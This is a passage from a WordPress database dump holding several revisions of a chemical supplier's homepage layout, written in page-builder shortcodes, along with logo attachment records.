height="5px"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n\r\n<h3>Technical Support</h3>\r\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Application Experts</h3>\r\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Large Inventory</h3>\r\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n[divider]\r\n\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1259" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1574"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1576"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1257"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 02:02:20', '2016-09-13 02:02:20', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1579, 2, '2016-09-13 12:28:10', '2016-09-13 12:28:10', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<em>Quality &amp; Service</em>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n[divider]\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1259" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1578"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1576"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 12:28:10', '2016-09-13 12:28:10', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1580, 2, '2016-09-13 12:32:57', '2016-09-13 12:32:57', '', 'hexion-logo', '', 'inherit', 'open', 'closed', '', 'hexion-logo-2', '', '', '2016-09-13 12:32:57', '2016-09-13 12:32:57', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion-logo-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1581, 2, '2016-09-13 12:37:39', '2016-09-13 12:37:39', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<em>Quality &amp; Service</em>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n[divider]\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1259" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1578"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 12:37:39', '2016-09-13 12:37:39', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1583, 2, '2016-09-13 12:40:59', '2016-09-13 12:40:59', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<em>Quality &amp; Service</em>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n[divider]\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1259" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1578"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1582"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 12:40:59', '2016-09-13 12:40:59', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1584, 2, '2016-09-13 12:43:33', '2016-09-13 12:43:33', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<p><em>Quality &amp; Service</em></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1578"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1582"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 12:43:33', '2016-09-13 12:43:33', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1585, 2, '2016-09-13 12:43:49', '2016-09-13 12:43:49', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<em>Quality &amp; Service</em>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n[divider]\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1259" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1578"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1582"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 12:43:49', '2016-09-13 12:43:49', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1586, 2, '2016-09-13 12:46:23', '2016-09-13 12:46:23', '', 'opteon-logo', '', 'inherit', 'open', 'closed', '', 'opteon-logo-2', '', '', '2016-09-13 12:46:23', '2016-09-13 12:46:23', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/opteon-logo-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
